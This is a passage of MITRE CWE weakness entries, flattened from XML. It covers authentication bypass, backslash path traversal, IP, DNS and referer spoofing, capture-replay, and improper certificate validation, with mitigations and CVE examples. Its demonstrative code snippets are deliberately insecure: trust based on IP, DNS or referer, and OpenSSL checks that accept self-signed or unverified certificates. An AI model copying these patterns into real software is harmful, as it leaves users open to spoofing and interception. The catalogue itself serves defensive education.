Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - Authentication Bypass by Alternate Path/Channel - - - - The software performs authentication based on the name of a resource being accessed, or the name of the actor performing the access, but it does not properly check all possible names for that resource or actor. - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2003-0317 - Protection mechanism that restricts URL access can be bypassed using URL encoding. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0317 - - - CVE-2004-0847 - Bypass of authentication for files using "\" (backslash) or "%5C" (encoded backslash). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0847 - - - - - Authentication bypass by alternate name - - - IDS01-J - Normalize strings before validating them - CWE More Specific - - - IDS01-J - Normalize strings before validating them - CWE More Specific - - - - Overlaps equivalent encodings, canonicalization, authorization, multiple trailing slash, trailing space, mixed case, and other equivalence issues. - Alternate names are useful in data driven manipulation attacks, not just for authentication. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes, Potential_Mitigations, Theoretical_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '\..\filename' (leading backslash dot dot) sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - This is similar to CWE-25, except using "\" instead of "/". Sometimes a program checks for "..\" at the beginning of the input, so a "\..\" can bypass that check. It is also useful for bypassing path traversal protection schemes that only assume that the "/" separator is valid. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-2002-1987 - Protection mechanism checks for "/.." but doesn't account for Windows-specific "\.." allowing read of arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1987 - - - CVE-2005-2142 - Directory traversal vulnerability in FTP server allows remote authenticated attackers to list arbitrary directories via a "\.." sequence in an LS command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2142 - - - - - '\..\filename' ('leading dot dot backslash') - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms, Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Leading Dot Dot Backslash - '\..\filename' - - - - This attack-focused weakness is caused by improperly implemented authentication schemes that are subject to spoofing attacks. - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - Gain Privileges or Assume Identity - This weakness can allow an attacker to access resources which are not otherwise accessible without proper authentication. - - - - - The following code authenticates users. - - String sourceIP = request.getRemoteAddr();if (sourceIP != null && sourceIP.equals(APPROVED_IP)) {authenticated = true;} - - The authentication mechanism implemented relies on an IP address for source validation. If an attacker is able to spoof the IP, they may be able to bypass the authentication mechanism. - - - Both of these examples check if a request is from a trusted address before responding to the request. - - sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv)); - while (1) {memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);}} - - - while(true) { - DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort(); - if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);} - } - - The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. - - - The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. - - struct hostent *hp;struct in_addr myaddr;char* tHost = "trustme.example.com";myaddr.s_addr=inet_addr(ip_addr_string); - hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET);if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) {trusted = true;} else {trusted = false;} - - - String ip = request.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);if (addr.getCanonicalHostName().endsWith("trustme.com")) {trusted = true;} - - - IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress);if (hostInfo.HostName.EndsWith("trustme.com")) {trusted = true;} - - IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. - - - - - CVE-2009-1048 - VOIP product allows authentication bypass using 127.0.0.1 in the Host header. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1048 - - - - - Authentication bypass by spoofing - - - - - - - - - - - - - - - - - - - This can be resultant from insufficient verification. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Related_Attack_Patterns - - - - - The software uses an IP address for authentication. - IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. - - - - - - - - Resultant - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Access Control - Non-Repudiation - Hide Activities - Gain Privileges or Assume Identity - Malicious users can fake authentication information, impersonating any IP address. - - - - - Architecture and Design - Use other means of identity verification that cannot be simply spoofed. Possibilities include a username/password or certificate. - - - - - Both of these examples check if a request is from a trusted address before responding to the request. - - sd = socket(AF_INET, SOCK_DGRAM, 0);serv.sin_family = AF_INET;serv.sin_addr.s_addr = htonl(INADDR_ANY);servr.sin_port = htons(1008);bind(sd, (struct sockaddr *) & serv, sizeof(serv)); - while (1) {memset(msg, 0x0, MAX_MSG);clilen = sizeof(cli);if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) {n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen);}} - - - while(true) { - DatagramPacket rp=new DatagramPacket(rData,rData.length);outSock.receive(rp);String in = new String(p.getData(),0, rp.getLength());InetAddress clientIPAddress = rp.getAddress();int port = rp.getPort(); - if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) {out = secret.getBytes();DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp);} - } - - The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. - - - - - Trusting self-reported IP address - - - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-02-16 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-06-23 - Critical - Changed type from composite to weakness. - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Description, Name, Relationships, Type - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Trusting Self-reported IP Address - - - - This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-06-23 - Critical - CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-03-15 - updated Likelihood_of_Exploit, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - Trusting Self-reported DNS Name - DEPRECATED (Duplicate): Trusting Self-reported DNS Name - - - - The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking. - - - - - - - - The referer field in HTML requests can be simply modified by malicious users, rendering it useless as a means of checking the validity of the request in question. - - - - referrer - While the proper spelling might be regarded as "referrer," the HTTP RFCs and their implementations use "referer," so this is regarded as the correct spelling. - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Access Control - Gain Privileges or Assume Identity - Actions, which may not be authorized otherwise, can be carried out as if they were validated by the server referred to. - - - - - Architecture and Design - In order to usefully check if a given action is authorized, some means of strong authentication and method protection must be used. Use other means of authorization that cannot be simply spoofed. Possibilities include a username/password or certificate. - - - - - The following code samples check a packet's referer in order to decide whether or not an inbound request is from a trusted host. - - String trustedReferer = "http://www.example.com/"while(true){n = read(newsock, buffer, BUFSIZE);requestPacket = processPacket(buffer, n);if (requestPacket.referer == trustedReferer){openNewSecureSession(requestPacket);}} - - - boolean processConnectionRequest(HttpServletRequest request){String referer = request.getHeader("referer")String trustedReferer = "http://www.example.com/"if(referer.equals(trustedReferer)){openPrivilegedConnection(request);return true;}else{sendPrivilegeError(request);return false;}} - - These examples check if a request is from a trusted referer before responding to a request, but the code only verifies the referer name as stored in the request packet. An attacker can spoof the referer, thus impersonating a trusted client. - - - - - Using referrer field for authentication - - - SFP29 - Faulty endpoint authentication - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Background_Details, Common_Consequences, Relationships, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - - - - A capture-replay flaw exists when the design of the software makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes). - Capture-replay attacks are common and can be difficult to defeat without cryptography. They are a subset of network injection attacks that rely on observing previously-sent valid commands, then changing them slightly if necessary and resending the same commands to the server. - - - - - - - - - - Architecture and Design - COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. - - - High - - - Access Control - Gain Privileges or Assume Identity - Messages sent with a capture-relay attack allow access to resources which are not otherwise accessible without proper authentication. - - - - - Architecture and Design - Utilize some sequence or time stamping functionality along with a checksum which takes this into account in order to ensure that messages can be parsed only once. - - - Architecture and Design - Since any attacker who can listen to traffic can see sequence numbers, it is necessary to sign messages with some kind of cryptography to ensure that sequence numbers are not simply doctored along with content. - - - - - CVE-2005-3435 - product authentication succeeds if user-provided MD5 hash matches the hash in its database; this can be subjected to replay attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3435 - - - CVE-2007-4961 - Chain: cleartext transmission of the MD5 hash of password (CWE-319) enables attacks against a server that is susceptible to replay (CWE-294). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4961 - - - - - Authentication bypass by replay - - - Capture-replay - - - - - - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The software does not validate, or incorrectly validates, a certificate. - When a certificate is invalid or malicious, it might allow an attacker to spoof a trusted entity by interfering in the communication path between the host and client. The software might connect to a malicious host while believing it is a trusted host, or the software might be deceived into accepting spoofed data that appears to originate from a trusted host. - - - - - - - - - - - A certificate is a token that associates an identity (principal) to a cryptographic key. Certificates can be used to check if a public key belongs to the assumed owner. - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - Implementation - When the software uses certificate pinning, the developer might not properly validate all relevant components of the certificate before pinning the certificate. This can make it difficult or expensive to test after the pinning is complete. - - - - - Integrity - Authentication - Bypass Protection Mechanism - Gain Privileges or Assume Identity - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Man-in-the-middle attack tool - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Focused Manual Spotcheck - Focused manual analysis of source - Manual Source Code Review (not inspections) - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Implementation - Certificates should be carefully managed and checked to assure that data are encrypted with the intended owner's public key. - - - Implementation - If certificate pinning is being used, ensure that all relevant properties of the certificate are fully validated before the certificate is pinned, including the hostname. - - - - - This code checks the certificate of a connected peer. - - if ((cert = SSL_get_peer_certificate(ssl)) && host)foo=SSL_get_verify_result(ssl); - if ((X509_V_OK==foo) || X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN==foo)) - - - // certificate looks good, host can be trusted - - - - - - In this case, because the certificate is self-signed, there was no external authority that could prove the identity of the host. The program could be communicating with a different system that is spoofing the host, e.g. by poisoning the DNS cache or using an Adversary-in-the-Middle (AITM) attack to modify the traffic from server to client. - - - The following OpenSSL code obtains a certificate and verifies it. - - cert = SSL_get_peer_certificate(ssl);if (cert && (SSL_get_verify_result(ssl)==X509_V_OK)) { - - - // do secret things - - - } - - Even though the "verify" step returns X509_V_OK, this step does not include checking the Common Name against the name of the host. That is, there is no guarantee that the certificate is for the desired host. The SSL connection could have been established with a malicious host that provided a valid certificate. - - - The following OpenSSL code ensures that there is a certificate and allows the use of expired certificates. - - if (cert = SSL_get_peer(certificate(ssl)) { - foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERR_CERT_HAS_EXPIRED==foo)) - - - //do stuff - - - - - - - - If the call to SSL_get_verify_result() returns X509_V_ERR_CERT_HAS_EXPIRED, this means that the certificate has expired. As time goes on, there is an increasing chance for attackers to compromise the certificate. - - - The following OpenSSL code ensures that there is a certificate before continuing execution. - - if (cert = SSL_get_peer_certificate(ssl)) { - - - // got a certificate, do secret things - - - - - - Because this code does not use SSL_get_verify_results() to check the certificate, it could accept certificates that have been revoked (X509_V_ERR_CERT_REVOKED). The software could be communicating with a malicious host. - - - The following OpenSSL code ensures that the host has a certificate. - - if (cert = SSL_get_peer_certificate(ssl)) { - - - // got certificate, host can be trusted - - - //foo=SSL_get_verify_result(ssl); - - - //if (X509_V_OK==foo) ... - - - } - - Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate. - - - - - CVE-2014-1266 - chain: incorrect "goto" in Apple SSL product bypasses certificate validation, allowing Adversary-in-the-Middle (AITM) attack (Apple "goto fail" bug). CWE-705 (Incorrect Control Flow Scoping) -> CWE-561 (Dead Code) -> CWE-295 (Improper Certificate Validation) -> CWE-393 (Return of Wrong Status Code) -> CWE-300 (Channel Accessible by Non-Endpoint). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - CVE-2021-22909 - Chain: router's firmware update procedure uses curl with "-k" (insecure) option that disables certificate validation (CWE-295), allowing adversary-in-the-middle (AITM) compromise with a malicious firmware image (CWE-494). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22909 - - - CVE-2008-4989 - Verification function trusts certificate chains in which the last certificate is self-signed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4989 - - - CVE-2012-5821 - Web browser uses a TLS-related function incorrectly, preventing it from verifying that a server's certificate is signed by a trusted certification authority (CA) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5821 - - - CVE-2009-3046 - Web browser does not check if any intermediate certificates are revoked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3046 - - - CVE-2011-0199 - Operating system does not check Certificate Revocation List (CRL) in some cases, allowing spoofing using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0199 - - - CVE-2012-5810 - Mobile banking application does not verify hostname, leading to financial loss. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5810 - - - CVE-2012-3446 - Cloud-support library written in Python uses incorrect regular expression when matching hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3446 - - - CVE-2009-2408 - Web browser does not correctly handle '\0' character (NUL) in Common Name, allowing spoofing of https sites. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2408 - - - CVE-2012-2993 - Smartphone device does not verify hostname, allowing spoofing of mail services. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2993 - - - CVE-2012-5822 - Application uses third-party library that does not validate hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5822 - - - CVE-2012-5819 - Cloud storage management application does not validate hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5819 - - - CVE-2012-5817 - Java library uses JSSE SSLSocket and SSLEngine classes, which do not verify the hostname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5817 - - - CVE-2010-1378 - chain: incorrect calculation allows attackers to bypass certificate checks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1378 - - - CVE-2005-3170 - LDAP client accepts certificates even if they are not from a trusted CA. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3170 - - - CVE-2009-0265 - chain: DNS server does not correctly check return value from the OpenSSL EVP_VerifyFinal function allows bypass of validation of the certificate chain. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0265 - - - CVE-2003-1229 - chain: product checks if client is trusted when it intended to check if the server is trusted, allowing validation of signed code. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1229 - - - CVE-2002-0862 - Cryptographic API, as used in web browsers, mail clients, and other software, does not properly validate Basic Constraints. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862 - - - CVE-2009-1358 - chain: OS package manager does not check properly check the return value, allowing bypass using a revoked certificate. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1358 - - - - - A10 - Insecure Configuration Management - CWE More Specific - - - - - - - - - - - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Background_Details, Description - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2012-12-28 - Critical - Converted from category to weakness class. - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Background_Details, Modes_of_Introduction, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Observed_Examples - - Certificate Issues - - - - The software does not follow, or incorrectly follows, the chain of trust for a certificate back to a trusted root certificate, resulting in incorrect trust of any resource that is associated with that certificate. - - If a system does not follow the chain of trust of a certificate to a root server, the certificate loses all usefulness as a metric of trust. Essentially, the trust gained from a certificate is derived from a chain of trust -- with a reputable trusted entity at the end of that list. The end user must trust that reputable source, and this reputable source must vouch for the resource in question through the medium of the certificate. - In some cases, this trust traverses several entities who vouch for one another. The entity trusted by the end user is at one end of this trust chain, while the certificate-wielding resource is at the other end of the chain. If the user receives a certificate at the end of one of these trust chains and then proceeds to check only that the first link in the chain, no real trust has been derived, since the entire chain must be traversed back to a trusted source to verify the certificate. - There are several ways in which the chain of trust might be broken, including but not limited to: - - - Any certificate in the chain is self-signed, unless it the root. - Not every intermediate certificate is checked, starting from the original certificate all the way up to the root certificate. - An intermediate, CA-signed certificate does not have the expected Basic Constraints or other important extensions. - The root certificate has been compromised or authorized to the wrong party. - - - - - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during 